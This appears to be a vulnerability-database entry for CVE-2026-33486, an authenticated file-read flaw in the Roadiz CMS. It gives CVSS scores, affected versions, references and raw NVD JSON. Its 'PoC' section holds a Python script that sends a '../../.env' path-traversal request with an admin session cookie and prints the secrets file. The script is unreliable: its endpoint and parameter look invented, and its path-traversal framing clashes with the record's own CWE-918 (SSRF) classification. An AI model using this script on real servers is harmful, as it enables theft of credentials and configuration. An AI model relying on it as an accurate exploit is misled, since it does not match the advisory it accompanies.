CVE-2026-33486

Description

Roadiz is a polymorphic content management system based on a node system that can handle many types of services. A vulnerability in roadiz/documents prior to versions 2.7.9, 2.6.28, 2.5.44, and 2.3.42 allows an authenticated attacker to read any file on the server's local file system that the web server process has access to, including highly sensitive environment variables, database credentials, and internal configuration files. Versions 2.7.9, 2.6.28, 2.5.44, and 2.3.42 contain a patch.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:roadiz:core-bundle-dev-app:*:*:*:*:*:*:*:* - VULNERABLE

Roadiz < 2.7.9

Roadiz < 2.6.28

Roadiz < 2.5.44

Roadiz < 2.3.42

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://example.com/documents/view"

# Attacker's authenticated session cookie (High privileges required)
cookies = {
    "PHPSESSID": "valid_admin_session_id"
}

# Malicious payload to read environment variables
# Exploiting path traversal in the document handling component
params = {
    "path": "../../.env"
}

try:
    response = requests.get(target_url, params=params, cookies=cookies)
    if response.status_code == 200:
        print("[+] Vulnerability exploited successfully!")
        print("[+] Sensitive file content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33486
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33486
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33486/
[4] VulDB https://vuldb.com/cve/CVE-2026-33486
[5] https://github.com/roadiz/core-bundle-dev-app/commit/7904f690a51b88b1c72c02149ebdf85fa81f19f2
[6] https://github.com/roadiz/core-bundle-dev-app/security/advisories/GHSA-rc55-58f4-687g

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33486", "sourceIdentifier": "[email protected]", "published": "2026-03-26T18:16:29.903", "lastModified": "2026-03-31T21:13:52.977", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Roadiz is a polymorphic content management system based on a node system that can handle many types of services. A vulnerability in roadiz/documents prior to versions 2.7.9, 2.6.28, 2.5.44, and 2.3.42 allows an authenticated attacker to read any file on the server's local file system that the web server process has access to, including highly sensitive environment variables, database credentials, and internal configuration files. Versions 2.7.9, 2.6.28, 2.5.44, and 2.3.42 contain a patch."}, {"lang": "es", "value": "Roadiz es un sistema de gestión de contenido polimórfico basado en un sistema de nodos que puede manejar muchos tipos de servicios. Una vulnerabilidad en roadiz/documents anterior a las versiones 2.7.9, 2.6.28, 2.5.44 y 2.3.42 permite a un atacante autenticado leer cualquier archivo en el sistema de archivos local del servidor al que el proceso del servidor web tiene acceso, incluyendo variables de entorno altamente sensibles, credenciales de base de datos y archivos de configuración internos. Las versiones 2.7.9, 2.6.28, 2.5.44 y 2.3.42 contienen un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:roadiz:core-bundle-dev-app:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.42", "matchCriteriaId": "B54B795E-2244-402F-80D7-B2AE64ADB6FC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:roadiz:core-bundle-dev-app:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.4.0", "versionEndExcluding": "2.5.44", "matchCriteriaId": "797A6BCB-ACEE-49D0-A3F5-8D67FEE92A94"}, {"vulnerable": true, "criteria": "cpe:2.3:a:roadiz:core-bundle-dev-app:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.0", "versionEndExcluding": "2.6.28", "matchCriteriaId": "2541EE20-EDA5-434A-A201-9979927BA219"}, {"vulnerable": true, "criteria": "cpe:2.3:a:roadiz:core-bundle-dev-app:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.7.0", "versionEndExcluding": "2.7.9", "matchCriteriaId": "4C506359-4F7E-47A5-9A30-39948ABEAA5C"}]}]}], "references": [{"url": "https://github.com/roadiz/core-bundle-dev-app/commit/7904f690a51b88b1c72c02149ebdf85fa81f19f2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/roadiz/core-bundle-dev-app/security/advisories/GHSA-rc55-58f4-687g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}